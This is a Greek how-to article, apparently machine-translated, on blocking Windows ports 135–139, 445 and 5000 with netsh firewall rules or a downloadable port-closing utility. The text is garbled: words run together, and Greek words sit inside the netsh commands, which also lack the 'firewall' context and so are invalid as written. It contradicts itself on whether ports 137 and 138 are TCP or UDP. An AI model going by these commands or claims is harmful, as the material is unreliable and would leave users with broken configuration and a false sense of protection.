Κάθε μέρα, οι ιδιοκτήτες Η/Υ έρχονται αντιμέτωποι με τεράστιο ποσό επικίνδυνα προγράμματακαι ιούς που με τον ένα ή τον άλλο τρόπο μπαίνουν στον σκληρό δίσκο και προκαλούν διαρροή σημαντικών δεδομένων, βλάβη υπολογιστή, κλοπή σημαντικές πληροφορίεςκαι άλλες δυσάρεστες καταστάσεις.

Τις περισσότερες φορές, οι υπολογιστές που εκτελούνται σε Windows οποιασδήποτε έκδοσης, είτε είναι 7, 8, 10 είτε οποιαδήποτε άλλη, έχουν μολυνθεί. κύριος λόγοςΤέτοια στατιστικά είναι εισερχόμενες συνδέσεις σε υπολογιστή ή "θύρες", που είναι το αδύναμο σημείο οποιουδήποτε συστήματος λόγω της διαθεσιμότητάς τους από προεπιλογή.

Η λέξη "λιμάνι" είναι όρος που σημαίνει σειριακός αριθμόςεισερχόμενες συνδέσεις που κατευθύνονται στον υπολογιστή σας από εξωτερικό λογισμικό. Συμβαίνει συχνά αυτές οι θύρες να χρησιμοποιούν ιούς που διεισδύουν εύκολα στον υπολογιστή σας χρησιμοποιώντας ένα δίκτυο IP.

Ιογενής λογισμικό, μόλις εισέλθει στον υπολογιστή μέσω τέτοιων εισερχόμενων συνδέσεων, μολύνει γρήγορα όλα τα σημαντικά αρχεία, όχι μόνο τα αρχεία χρήστη, αλλά και αυτά του συστήματος. Για να αποφευχθεί αυτό, συνιστούμε να κλείσετε όλες τις τυπικές θύρες, οι οποίες μπορεί να γίνουν το ευάλωτο σημείο σας όταν δέχεστε επίθεση από χάκερ.

Ποιες θύρες είναι οι πιο ευάλωτες στα Windows 7-10;

Πολυάριθμες μελέτες και έρευνες εμπειρογνωμόνων δείχνουν ότι έως και το 80% των κακόβουλων επιθέσεων και εισβολών πραγματοποιήθηκαν χρησιμοποιώντας τις τέσσερις κύριες θύρες που χρησιμοποιούνται για τη γρήγορη ανταλλαγή αρχείων μεταξύ διαφορετικές εκδόσεις Windows:

  • Απαιτείται η θύρα TCP 139 για απομακρυσμένη σύνδεσηκαι έλεγχος Η/Υ.
  • Θύρα TCP 135, που προορίζεται για την εκτέλεση εντολών.
  • Θύρα TCP 445 για γρήγορη μεταφορά αρχείων.
  • Θύρα UDP 137, μέσω της οποίας πραγματοποιείται γρήγορη αναζήτηση στον Η/Υ.

Κλείστε τις θύρες 135-139 και 445 στα Windows

Σας προσκαλούμε να εξοικειωθείτε με τα περισσότερα απλούς τρόπουςΚλείσιμο θυρών Windows που δεν απαιτούν πρόσθετες γνώσεις και επαγγελματικές δεξιότητες.

Χρησιμοποιώντας τη γραμμή εντολών

Εντολή Συμβολοσειρά Windows- αυτό είναι ένα κέλυφος λογισμικού που χρησιμοποιείται για τη ρύθμιση ορισμένων λειτουργιών και παραμέτρων για λογισμικό που δεν έχει δικό του κέλυφος γραφικών.

Για να τρέξω γραμμή εντολών, απαραίτητη:

  1. Πατήστε ταυτόχρονα το συνδυασμό πλήκτρων Win + R
  2. Στη γραμμή εντολών που εμφανίζεται, πληκτρολογήστε cmd
  3. Κάντε κλικ στο κουμπί "OK".

θα εμφανιστει παράθυρο εργασίαςμε μαύρο φόντο, στο οποίο είναι απαραίτητο να εισάγετε μία προς μία τις παρακάτω εντολές. Μετά την εισαγωγή κάθε γραμμής, πατήστε το πλήκτρο Enter για να επιβεβαιώσετε την ενέργεια.
netsh advfirewall add κανόνα dir=in action=block protocol=tcp localport=135 name="Block1_TCP-135"(εντολή για κλείσιμο της θύρας 135)
netsh advfirewall add κανόνα dir=in action=block protocol=tcp localport=137 name="Block1_TCP-137"(εντολή για κλείσιμο της θύρας 137)
netsh advfirewall add κανόνα dir=in action=block protocol=tcp localport=138 name="Block1_TCP-138"(εντολή για κλείσιμο της θύρας 138)
netsh advfirewall προσθήκη κανόνα dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"(εντολή για κλείσιμο της θύρας 139)
netsh advfirewall προσθήκη κανόνα dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"(εντολή για κλείσιμο της θύρας 445)
netsh advfirewall add κανόνα dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"

Οι έξι εντολές που δώσαμε χρειάζονται για: κλείσιμο 4 ευάλωτων θυρών TCP των Windows (ανοιχτές από προεπιλογή), κλείσιμο της θύρας UDP 138 και κλείσιμο της θύρας 5000, η ​​οποία είναι υπεύθυνη για την εμφάνιση μιας λίστας διαθέσιμων υπηρεσιών.

Κλείνουμε τις θύρες με προγράμματα τρίτων

Εάν δεν θέλετε να αφιερώσετε χρόνο στην εργασία με τη γραμμή εντολών, σας προτείνουμε να εξοικειωθείτε εφαρμογές τρίτων. Η ουσία αυτού του λογισμικού είναι να επεξεργαστείτε το μητρώο αυτόματη λειτουργίαΜε GUI, χωρίς να απαιτείται χειροκίνητη εισαγωγή εντολών.

Σύμφωνα με τους χρήστες μας, τα περισσότερα δημοφιλές πρόγραμμαγια αυτούς τους σκοπούς είναι το Windows Doors Cleaner. Θα σας βοηθήσει να κλείσετε εύκολα τις θύρες σε έναν υπολογιστή με Windows 7/8/8.1/10. Παλαιότερες εκδόσεις λειτουργικά συστήματαδυστυχώς δεν υποστηρίζεται.

Πώς να εργαστείτε με ένα πρόγραμμα που κλείνει τις θύρες

Για να χρησιμοποιήσετε το Windows Doors Cleaner, πρέπει:

1. Κατεβάστε το λογισμικό και εγκαταστήστε το
2. Εκτελέστε το πρόγραμμα κάνοντας δεξί κλικ στη συντόμευση και επιλέγοντας "run as administrator"
3. Στο παράθυρο εργασίας που εμφανίζεται, θα υπάρχει μια λίστα θυρών και τα κουμπιά «Κλείσιμο» ή «Απενεργοποίηση» που κλείνουν τις ευάλωτες θύρες των Windows, καθώς και όποιες άλλες θύρες επιθυμείτε
4. Αφού γίνουν οι απαραίτητες αλλαγές, πρέπει να επανεκκινήσετε το σύστημα

Ένα άλλο πλεονέκτημα του προγράμματος είναι το γεγονός ότι με τη βοήθειά του μπορείτε όχι μόνο να κλείσετε τις θύρες, αλλά και να τις ανοίξετε.

Βγάζοντας συμπεράσματα

Το κλείσιμο ευάλωτων θυρών δικτύου στα Windows δεν είναι πανάκεια για όλα τα δεινά. Είναι σημαντικό να θυμάστε ότι η ασφάλεια του δικτύου μπορεί να επιτευχθεί μόνο μέσω ολοκληρωμένων ενεργειών που στοχεύουν στο κλείσιμο όλων των τρωτών σημείων του υπολογιστή σας.

Για ασφάλεια χρήστης των Windowsείναι υποχρεωτικό να εγκαταστήσετε κρίσιμες ενημερώσεις από τη Microsoft, να έχετε άδεια λογισμικού προστασίας από ιούς και ένα ενεργοποιημένο τείχος προστασίας, να χρησιμοποιείτε μόνο ασφαλές λογισμικό και να διαβάζετε τακτικά τα άρθρα μας στα οποία μιλάμε για όλα υπάρχουσες μεθόδουςεπιτύχετε την ανωνυμία και την ασφάλεια των δεδομένων σας.

Ξέρετε καλύτερους τρόπους για να κλείσετε τις θύρες δικτύου; Μοιραστείτε τις γνώσεις σας στα σχόλια και μην ξεχάσετε να αναδημοσιεύσετε το άρθρο στη σελίδα σας. Μερίδιο ΧΡΗΣΙΜΕΣ ΠΛΗΡΟΦΟΡΙΕΣμε τους φίλους σας και μην δίνετε την ευκαιρία στους χάκερ να βλάψουν τους αγαπημένους σας!